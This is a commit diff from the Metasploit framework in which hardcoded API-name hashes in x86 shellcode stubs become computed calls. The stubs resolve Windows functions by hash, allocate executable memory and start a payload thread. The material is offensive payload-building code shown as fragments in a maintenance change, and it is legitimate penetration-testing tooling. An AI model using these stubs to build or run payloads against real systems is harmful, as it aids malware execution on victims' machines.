fix(payloads): removing hardcoded block-api hashes

rapid7 · Nov 22, 2024 · 37d5b90 · 37d5b90
1 parent d5bcd50
commit 37d5b90
Showing 1 changed file with 9 additions and 9 deletions.
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
@@ -1777,15 +1777,15 @@ def self.win32_rwx_exec(code)
     ; Note: Execution is not expected to (successfully) continue past this block
 
     exitfunk:
-      mov ebx, 0x0A2A1DE0    ; The EXITFUNK as specified by user...
-      push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+      mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}    ; The EXITFUNK as specified by user...
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')}        ; hash( "kernel32.dll", "GetVersion" )
       mov eax, ebp
       call eax               ; GetVersion(); (AL will = major version and AH will = minor version)
       cmp al, byte 6         ; If we are not running on Windows Vista, 2008 or 7
       jl goodbye             ; Then just call the exit function...
       cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
       jne goodbye      ;
-      mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+      mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')}    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
     goodbye:                 ; We now perform the actual call to the exit function
       push byte 0            ; push the exit function parameter
       push ebx               ; push the hash of the exit function
@@ -1808,7 +1808,7 @@ def self.win32_rwx_exec(code)
       push 0x1000            ; MEM_COMMIT
       push esi               ; Push the length value of the wrapped code block
       push byte 0            ; NULL as we dont care where the allocation is.
-      push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}        ; hash( "kernel32.dll", "VirtualAlloc" )
       call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
       mov ebx, eax           ; Store allocated address in ebx
@@ -1887,14 +1887,14 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
     ; Note: Execution is not expected to (successfully) continue past this block
 
     exitfunk:
-      mov ebx, 0x0A2A1DE0    ; The EXITFUNK as specified by user...
-      push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+      mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}    ; The EXITFUNK as specified by user...
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')}        ; hash( "kernel32.dll", "GetVersion" )
       call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
       cmp al, byte 6         ; If we are not running on Windows Vista, 2008 or 7
       jl goodbye       ; Then just call the exit function...
       cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
       jne goodbye      ;
-      mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+      mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')}    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
     goodbye:                 ; We now perform the actual call to the exit function
       push byte 0            ; push the exit function parameter
       push ebx               ; push the hash of the exit function
@@ -1918,7 +1918,7 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
       push 0x1000            ; MEM_COMMIT
       push esi               ; Push the length value of the wrapped code block
       push byte 0            ; NULL as we dont care where the allocation is.
-      push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}        ; hash( "kernel32.dll", "VirtualAlloc" )
       call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
       mov ebx, eax           ; Store allocated address in ebx
@@ -1943,7 +1943,7 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
       push ebx               ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
       push eax               ; SIZE_T dwStackSize (0 for default)
       push eax               ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
-      push 0x160D6838        ; hash( "kernel32.dll", "CreateThread" )
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateThread')}        ; hash( "kernel32.dll", "CreateThread" )
       call ebp               ; Spawn payload thread
 
       pop eax                ; Skip